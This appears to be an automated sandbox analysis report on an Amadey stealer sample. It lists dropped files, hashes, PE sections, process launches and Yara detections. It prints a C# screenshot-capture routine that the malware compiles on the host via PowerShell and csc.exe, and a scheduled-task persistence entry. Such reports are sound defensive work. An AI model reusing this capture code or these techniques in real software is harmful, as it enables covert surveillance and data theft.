                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................02.....d.....@.................................W...k...........................,.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...uyplpdnx.@+......>+.................@...lxepjdzt......1......2..............@....taggant.0....2.."...6..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:MSVC .res
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):652
                                                                                                                                                                                                                                        Entropy (8bit):3.0822564844713884
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryalpak7YnqqplePN5Dlq5J:+RI+ycuZhNQrakSpEPNnqX
                                                                                                                                                                                                                                        MD5:C63D970ED48E8A225320F3DC36154FC4
                                                                                                                                                                                                                                        SHA1:81D0B4B2E788EFD03817116D9460CFB6D4C853F9
                                                                                                                                                                                                                                        SHA-256:4EC26AEE81A238E92C0EE64E5BB072CA6B9AAA687A09AE3086A391B12B2DF891
                                                                                                                                                                                                                                        SHA-512:358963F7A6EC7CFA864154778F0DA9A15C07BB25EEA8ACE17512B80A3943ABF13C27611EAA49C5117860EA113D13EE7ACE6CAE8196DD6E41D370D2156A190070
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.s.o.p.u.e.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.2.s.o.p.u.e.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.0.cs

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1004
                                                                                                                                                                                                                                        Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                        MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                        SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                        SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                        SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):609
                                                                                                                                                                                                                                        Entropy (8bit):5.2929243924680005
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fD:p37Lvkmb6KOkqe1xBkrk+ikqB+WZE25
                                                                                                                                                                                                                                        MD5:BDF8A32760C919FB339DFFDDDC8A68E8
                                                                                                                                                                                                                                        SHA1:24750C320AC4D47A92B6B93C03543E60ACBA6F0B
                                                                                                                                                                                                                                        SHA-256:E0B09426325110F90343435C71E9EB1C49DE228EADBE52FA8A340C5EF589B4CA
                                                                                                                                                                                                                                        SHA-512:DAE3A98EACD64BED0885D180E55B549501C4B036CF5F45792BD2E0662C599407A230AF75848324D495283A7FAEFEC15C86D1F4A2DEA023DF7F2FEBA55E37252A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.0.cs"

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4096
                                                                                                                                                                                                                                        Entropy (8bit):3.1492159416705823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:6o7oEAtf0KhzBU/cf6mtJ3N05pW1ulSa3mq:INz0zmfO5EK
                                                                                                                                                                                                                                        MD5:85FBDED3E99C6FADA984AC77141F7F98
                                                                                                                                                                                                                                        SHA1:B08DA3FD3FCAC051EEBFFCF708246FEE96352203
                                                                                                                                                                                                                                        SHA-256:A32C6F14520630FE83CEFEDCEFA0E8338FADA1CCABAAE434C90685C7E93C1876
                                                                                                                                                                                                                                        SHA-512:0BC016EEB150FF376AD46A02A60017EB46E57D442DC642793E0B0CE977DD9A94D426C9EB19FE7878C2152B96968CA15EC973FF4C77A7227E070ED944C69A46A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.out

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1152
                                                                                                                                                                                                                                        Entropy (8bit):5.470904781379983
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:KLNohId3ka6KOkqeFkqNE28Kax5DqBVKVrdFAMBJTH:2N8kka6NkqeFkqNE28K2DcVKdBJj
                                                                                                                                                                                                                                        MD5:140EC8ACCB996DAA0BCA5443CD9AA204
                                                                                                                                                                                                                                        SHA1:39C4487EA45576A3C8DCC32601E702E4E1EC74C8
                                                                                                                                                                                                                                        SHA-256:FC3BDB65DDCC2F963CE9583114B98AB739C6F9ED45D32B7D1187E84B047ED254
                                                                                                                                                                                                                                        SHA-512:C7BE9F4953B863F1BC95294584533DECB5EF8DC48640F4284CFB34F7DFFB96682552B9130B1ABE119DB037CEC3BD8E4A9D7A3FC1A1F1E8C410411C6F2AC7E342
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no lo

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\vLqBW.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe
                                                                                                                                                                                                                                        File Type:RAR archive data, v5
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):758686
                                                                                                                                                                                                                                        Entropy (8bit):7.9997493017828285
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:VwYIkQxqdnvV6wxSP4pQm4JW6qI4Koy1CtPPpPVR4L8zC4:VwYZQxqVvNpwJW6z7oBRdRm4
                                                                                                                                                                                                                                        MD5:FB4B12411BBF00753EB2FC9CFB3E67BE
                                                                                                                                                                                                                                        SHA1:4183E9434179EE82DC386560E2818DEB7A3C4E86
                                                                                                                                                                                                                                        SHA-256:9688957B5EF3EF7C6DF96213BF16074514D971BEA9E450B6315EAC5ED016817A
                                                                                                                                                                                                                                        SHA-512:5BB41A5C53D645D03A5CFD35029B15B0D8706E38BF0948EF50E1D85CCCE3CB50096D5600EBF5850733BB108479CC7CFC86D26E8FF1198909E07329621953370F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Rar!......;.!..........."0..3..yt...O..a`.b..i[....Cf..&.X.7.-.. ...dsV.8.;..x...$......?h..../.c...P..`m...<.w1.....zk.2u.T0...rD....X.`c.!..p......f.SF....J...9.s....n_~..O.S..5....<....u0u].W_`.G...\.....Rl.B.H.f..qk@..Q!L.M...$.....S..q..x1.LG.Y./.).=z..MJ.oT*-..?L_..v.<......iv....r^.KHp5......e!.;*.8R_..WL>..Y....e....G. .....1... .$...kf...p.`C.Z.l.8!..._4.T...V..&.........S....d"T.z.^.^...e..!.}uz.]m..l....K..N.s.s.33. .X@5..8..G.}...\ ..>...Z..K..2O.....bn}".g..C..CX.cB,[..t{,,. ...f...Y..2..E...')..@.t...6...K<.oF(....w[.4....\.D......%=~N6.N3j..J!../=U.....T....7...R...G.8%...)eM8....'s.:.o...'...F.f..R..;......|...x&.J..z_.....c......+....}.6)...Q..#.2....7..-.."..#....V..iR._v.e.</y+r.bY=...?|..6.&..3....`.8G.1.(..wn...1.pz...Ia.....'..w.5.o.B9}......BP.....i..B!..o......k....#...9&5.[r.SlE:"2.s`.(.XW...C..[.rF..&..(].]......"S....Zw[..J."K.....7......&K..o#..-........E..."H..5t...y.{wcz..J+{m'.x...=[.+.!5l.:I..M.r.@.

                                                                                                                                                                                                                                        C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):290
                                                                                                                                                                                                                                        Entropy (8bit):3.4196376856720923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:RnX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lHtbut0:JuQ1CGAFifXVH8t0
                                                                                                                                                                                                                                        MD5:8CF96DE3B335E6E86EA8DD5AF3AC923A
                                                                                                                                                                                                                                        SHA1:82AB675AB274FC1C244FF05F41706DAEBC43D00B
                                                                                                                                                                                                                                        SHA-256:09D868876787ECA5ED7538E41E0E9610BB9686189093D6EE95EF20B793BE23F1
                                                                                                                                                                                                                                        SHA-512:ECA146EB71178125F2BFFDFE33407D9BC2FA69FA9582231F32F98813615719DB91500C685E96EAB792560D9CACABA718056DAF3D6C7E94BDCE7E2F3EA3EEC027
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....$i..lGTE....CqJ.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

                                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):97
                                                                                                                                                                                                                                        Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                        MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                        SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                        SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                        SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):6.54792183955597
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                                                        File size:3'037'184 bytes
                                                                                                                                                                                                                                        MD5:cd7686b11754d77b8722880a1a3a9a43
                                                                                                                                                                                                                                        SHA1:ea1c00d2985812539452a31d8f75506573dad692
                                                                                                                                                                                                                                        SHA256:a3d6d7eea1a9270e20be65394c942207078daac5952a12a9404dd4c557fd2944
                                                                                                                                                                                                                                        SHA512:64d095a52c5a9987cbdbe00c95cd96db67d5bf9faa9a53c1132eab27be7d0d8b7adf209195db8b925c6453ada759165ecfc8c1a5ac4f3ea7d3427fea2b643cab
                                                                                                                                                                                                                                        SSDEEP:49152:30HhKY2JwV6AskokjOnIY/cy6oMjYnJpY2Q2AM6J6OK:3mAJwV6AsFkiIycy6odnJ1Q2AM6J6O
                                                                                                                                                                                                                                        TLSH:CEE55B917405B1CFD48A177B8967ED42699D03B9072148C3ACADB8BEBDE3DC116F6C28
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x720000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp 00007F5E60E7752Ah

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x31e72c0x10uyplpdnx
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x31e6dc0x18uyplpdnx
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x680000x2de000a256f1eb2abd685c0b69a2b7f39c3d5False0.9983768307220708data7.986412821940457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x690000x5d40x40081df49c5cf11a93a5c587a846bc83433False0.712890625data5.81508100210508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        uyplpdnx0x6b0000x2b40000x2b3e00f02aad462a0c4c276d3d415f7cb39b81unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        lxepjdzt0x31f0000x10000x400a60aee545c16d449b7fa585cdcacd2b9False0.7548828125data5.926614948636206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x3200000x30000x2200822ce7b0a23a7c86a80aaeda0e4cc1bdFalse0.05778952205882353DOS executable (COM)0.7032949026486868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x31e73c0x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                        RT_MANIFEST0x31eb200x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:16:10:09
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                        Imagebase:0x260000
                                                                                                                                                                                                                                        File size:3'037'184 bytes
                                                                                                                                                                                                                                        MD5 hash:CD7686B11754D77B8722880A1A3A9A43
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2205661447.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:16:10:15
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                        File size:3'037'184 bytes
                                                                                                                                                                                                                                        MD5 hash:CD7686B11754D77B8722880A1A3A9A43
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2270058738.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:16:10:15
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                        File size:3'037'184 bytes
                                                                                                                                                                                                                                        MD5 hash:CD7686B11754D77B8722880A1A3A9A43
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
